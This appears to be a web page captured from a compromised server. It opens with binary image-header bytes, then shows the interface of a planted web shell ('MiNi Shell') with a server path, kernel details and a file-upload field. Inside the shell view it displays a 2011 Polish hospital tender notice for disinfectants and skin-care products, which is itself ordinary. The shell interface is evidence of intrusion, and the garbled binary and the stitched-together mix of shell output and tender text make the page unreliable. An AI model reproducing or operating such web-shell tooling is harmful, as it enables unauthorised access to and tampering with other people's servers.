JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20111123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20111123/305489-N-2011.html

<p class="kh_header"><b>Jelenia Góra: Dostawa środków dezynfekcyjnych i preparatów do pielęgnacji skóry</b><br>
<b>Numer ogłoszenia: 305489 - 2011; data zamieszczenia: 23.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzkie Centrum Szpitalne Kotliny Jeleniogórskiej , ul. Ogińskiego 6, 58-506 Jelenia Góra, woj. dolnośląskie, tel. 75 7537286, faks 75 7543883.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz.jgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa środków dezynfekcyjnych i preparatów do pielęgnacji skóry.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa środków dezynfekcyjnych i preparatów do pielęgnacji skóry :
- pakiet nr 1- środki dezynfekcyjne różne - 34 pozycje asortymentowe 
- pakiet nr 2- preparat do dezynfekcji bronchoskopów w myjce - dezynfektorze- 3 pozycje asortymentowe 
- pakiet nr 3- preparaty do profesjonalnej pielęgnacji skóry dla pacjentów w hospocium - 7 pozycji asortymentowych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8, 33.71.15.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta ma  być zabezpieczona wadium : 
- Pakiet nr 1- 13.232,00 zł. 
- Pakiet nr 2- 486,00 zł. 
- Pakiet nr 3- 485,00 zł. 
a) wadium ma być wniesione  do dnia 7.12.2011 r.  do godziny  10.00 
w poniższych formach :
- w pieniądzu PLN  ( na konto : 23 1020 2137 0000 9702 0129 1483) 
- w poręczeniach  bankowych
- w gwarancjach bankowych 
- gwarancjach ubezpieczeniowych
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42 poz. 275 z późn. zmian.) .
b) oferta, która nie będzie zabezpieczona akceptowaną formą wadium będzie odrzucona,
c) wadium wnoszone w pieniądzu  zostanie zwrócone wraz z odsetkami wynikającymi z umowy rachunku bankowego, ma którym było ono przechowywane, pomniejszone o koszt prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniężny na rachunek bankowy wskazany przez Wykonawcę,
d) Zamawiający zwróci wadium wszystkim Wykonawcą niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza  z zastrzeżeniem art. 46  ust.  4 a) Ustawy pzp. 
e) Wykonawcy ,którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwróci wadium niezwłocznie  po zawarciu umowy w sprawie zamówienia publicznego
f)  Zamawiający  zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert, 
g) Zamawiający będzie żądał ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie pkt. 6 d) SIWZ , jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca będzie zobowiązany wnieść wadium w terminie określonym przez Zamawiającego. 
h)  Wykonawca traci wadium na rzecz Zamawiającego wraz z odsetkami,  jeżeli:
- odmówi podpisania umowy na warunkach określonych w ofercie,
- zawarcie umowy stało się niemożliwe z  przyczyn leżących po stronie Wykonawcy
- eżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Ustawy pzp, nie złożył dokumentów lub oświadczeń , o których mowa w art. 25 ust. 1 Ustawy pzp  lub pełnomocnictw, chyba ,że  udowodnił , że wynika to z przyczyn nie leżących  po jego stronie</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)wypełniony druk oferty  - na podstawie załącznika nr 2 ,
b)szczegółową ofertę cenową (załącznik nr 6) w oparciu o  wykaz   asortymentowo- ilościowy - zał. nr 1  również w formie elektronicznej ( Exel, np.  CD)  
c)określenie terminu dostawy każdej partii zamówionego towaru:  max  48 godziny  , dostawa na cito 24  godzin - należy wpisać do formularza oferty - załącznik nr 2;  
d)określenie ostatecznych warunków  i terminu płatności (min termin płatności 
min 30  dni )- należy wpisać do formularza oferty załącznik nr 2 ,
e)określenie stałości cen ( min. 24  miesiące od daty obowiązywania umowy ) - należy wpisać do formularza oferty, 
f)określenie terminu ważności zaoferowanego asortymentu ( min. 3   miesiące  od daty dostarczenia towaru)  - należy wpisać do formularza ofert załącznik nr 2 ,
g)aktualny odpis z właściwego rejestru , jeżeli odrębne przepisy wymagają wpisu do rejestru , w celu wskazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. Ustawy pzp  wystawionego nie wcześniej niż 6 miesięcy przez upływem terminu składania ofert a stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt. 2 Ustawy pzp,  
h)oświadczenie  art. 22 ust. 1 ustawy  - zgodnie z załącznikiem nr 3 
i)oświadczenie , że Wykonawca  nie podlega wykluczeniu z postępowania na podstawie  art. 24  ust. 1 i 2  ustawy  z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych ( zgodnie  z załączonym formularzem , załącznik nr 4 ),  
j)Ponadto Zamawiający żąda  złożenia oświadczeń, że oferowany przedmiot zamówienia spełnia następujące wymogi:
1.w przypadku środków zakwalifikowanych jako kosmetyk - ustawy z dnia 30 marca 2001r. o kosmetykach (Dz. U. Nr 42, poz. 473 z późn. zm.) - należy wskazać których pozycji asortymentowych oświadczenie dotyczy, 
2.w przypadku środków zakwalifikowanych jako środki antyseptyczne do odkażania skóry i błon śluzowych - ustawy z dnia 6 września 2001r. Prawo Farmaceutyczne (tekst jednolity Dz. U. z 2008r. Nr 45, poz. 271) - należy wskazać których pozycji asortymentowych oświadczenie dotyczy, 
3.w przypadku środków zakwalifikowanych jako wyroby medyczne - ustawy       z dnia 20 maja 2010r. o wyrobach medycznych (Dz. U. Nr 107, poz. 679 z późn. zm.) - należy wskazać których pozycji asortymentowych oświadczenie dotyczy,
4.w przypadku środków zakwalifikowanych jako produkty biobójcze - ustawy z dnia 13 września 2002r. o produktach biobójczych (Dz. U. z 2007r, Nr 39, poz.252 tekst jednolity) - należy wskazać których pozycji asortymentowych oświadczenie dotyczy.
Uwaga: Wykonawca jest zobowiązany w każdym czasie na wezwanie Zamawiającego do potwierdzenia  wymogów określonych w pkt. j 1-4
k)Chemiczne środki dezynfekcyjne i bójcze posiadają dokumenty potwierdzające przeprowadzenie badań według normy PN-EN14885:2008 w kierunku skuteczności redukcji drobnoustrojów w warunkach brudnych i czystych                  w obszarze medycznym. W przypadku braku norm Zamawiający wymaga dołączenia  opinii z  uznawanych ośrodków opiniotwórczych (np.PZH, DGHM/VAH, RKI).
l) Karty charakterystyki produktów niebezpiecznych - dotyczy środków zakwalifikowanych jako produkty biobójcze - zgodnie z ustawą z dnia 13 września 2002r. o produktach biobójczych (Dz. U. z 2007r, Nr 39, poz. 252 tekst jednolity) w związku z ustawą z dnia 11 stycznia 2001r. o substancjach i preparatach chemicznych (Dz. U. Nr 11, poz. 84 z późn. zm.) - należy wskazać których pozycji asortymentowych  karty dotyczą,
ł) W przypadku składania oferty na pakiet nr 1 pozycję 15 - do oferty należy dołączyć pozytywną opinię Instytutu Matki i Dziecka lub innej instytucji opiniotwórczej.
m)  dołączyć aktualny katalog, prospekt lub folder w języku polskim dla  każdej zaoferowanej pozycji zawierający opis składu jakościowego, ilościowego, spektrum działania, pojemność, stężenie roztworu roboczego potwierdzające wymagania postawione przez Zamawiającego w załączniku nr 1 do SIWZ -  dotyczy wszystkich pozycji asortymentowych należy wskazać do którego pakietu i pozycji została dołączona wymagana karta. 
n) W celu zapewnienia prawidłowego używania środka do dezynfekcji rąk -dotyczy pakietu nr1 pozycja nr 3 - Wykonawca jest zobowiązany do dostarczenia nieodpłatnie 40 dozowników przyłóżkowych oraz 200 ściennych dozowników łokciowych na środek do dezynfekcji rąk w butelkach 500ml - dołączyć oświadczenie w tej sprawie 

Uwaga: Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, ma zastosowanie §2 ust. 2, § 4 ust. 1 Rozporządzenia Prezesa Rady Ministrów ( Dz. U. z 2009 r. Nr 226, poz. 1817) w sprawie rodzajów dokumentów jakich może żądać Zamawiający od Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>- Zamawiający zastrzega sobie w trakcie realizacji umowy prawo do wprowadzenia zmian których nie można było przewidzieć w chwili zawarcia umowy, a zmiany są korzystne dla Zamawiającego.
- W przypadku szczególnych okoliczności, takich jak wstrzymanie lub zakończenie produkcji, Zamawiający  dopuszcza możliwość dostarczania odpowiedników produktów objętych umową. 
- Zamawiający dopuszczaja zmianę cen jednostkowych produktów objętych umową w przypadku zmiany wielkości opakowania wprowadzonej przez producenta z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową.
- Zamawiający zastrzega sobie w trakcie realizacji umowy prawo do wprowadzenia zmian których nie można było przewidzieć w chwili zawarcia umowy, a zmiany są korzystne dla Zamawiającego. m.in. zmiany producenta, ilości sztuk                      w opakowaniu przy czym  opakowania nie mogą być  większe niż podane             w zał. nr 1 do SIWZ  przy odpowiednim przeliczeniu ilości zamówienia na okres realizacji zadania
Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy z wyłączeniem zmian w zakresie :
- numeru katalogowego produktu
- nazwy produktu przy zachowaniu jego parametrów 
- przedmiotowym / produkt zamienny
- liczby opakowań 
w sytuacji gdy:
- wprowadzony zostanie do sprzedaży przez wykonawcę produkt zmodyfikowany / udoskonalony 
- wystąpi przejściowy brak produktu z przyczyn leżących po stronie producenta przy jednoczesnym dostarczeniu   produktu zamiennego o parametrach nie gorszych od produktu objętego umową</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzoz.jgora.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzkie Centrum Szpitalne w Jeleniej Górze ( 58-506), ul. Ogińskiego 6, - Dział Umów i Zaopatrzenia, pokój 024 w bud. D, tel. 75/753-7286; Forma papierowa SIWZ do pobrania za odpłatnością 25,00 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.12.2011 godzina 10:00, miejsce: Wojewódzkie Centrum Szpitalne Kotliny Jeleniogórskiej w Jeleniej Górze ( 58-506) , ul. Ogińskiego 6, - Sekretariat Szpitala , pokój 171 w bud.D.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> środki dezynfekcyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> środki dezynfekcyjne różne - 34 pozycji asortymentowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> środki dezynfekcyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> preparat do dezynfekcji bronchoskopów w myjce - dezynfektorze - 3 pozycje asortymentowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> środki dezynfekcyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> preparat do profesjonalnej pielęgnacji skóry dla pacjentów w hospocium - 7 pozycji asortymentowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.71.15.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com